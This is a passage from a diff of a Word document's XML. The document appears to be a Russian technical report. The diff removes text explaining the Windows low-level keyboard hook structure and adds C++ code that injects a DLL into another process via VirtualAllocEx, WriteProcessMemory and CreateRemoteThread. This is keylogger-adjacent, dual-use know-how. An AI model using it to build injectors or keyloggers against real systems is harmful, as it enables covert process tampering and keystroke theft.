+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>2.dll library.\n" &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return false;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>LPVOID dereercomp = VirtualAllocEx(h, NULL, strlen(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (dereercomp == NULL) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Error: the memory could not be allocated inside the chosen process.\n" &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Структура KBDLLHOOKSTRUCT содержит информацию о низкоуровневом событии ввода данных с клавиатуры.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return false;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>typedef struct {</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    DWORD  vkCode;</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>int n = WriteProcessMemory(h, dereercomp, dllName, strlen(dllName), NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    DWORD  scanCode;</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (n == 0) {</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    DWORD  flags;</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Error: there was no bytes written to the process's address space.\n" &lt;&lt; std::endl;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    DWORD  time;</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return false;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ULONG_PTR  dwExtraInfo;</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>HANDLE asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE) LoadLibAddr, dereercomp, 0, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (asdc == NULL) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>printf("Error: the remote thread could not be created.\n");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return false;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return true;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Error: Can't open process:" &lt;&lt; pId &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return false;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>} KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;</w:t>
-      </w:r>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5.5 </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">vkCode </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>устанавливает</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>код</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>виртуальной</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>клавиши</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Код должен быть значением в диапазоне 1 - 254.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>scanCode устанавливает аппаратный код опроса</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> клавиатуры (скэн-код) клавиши.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
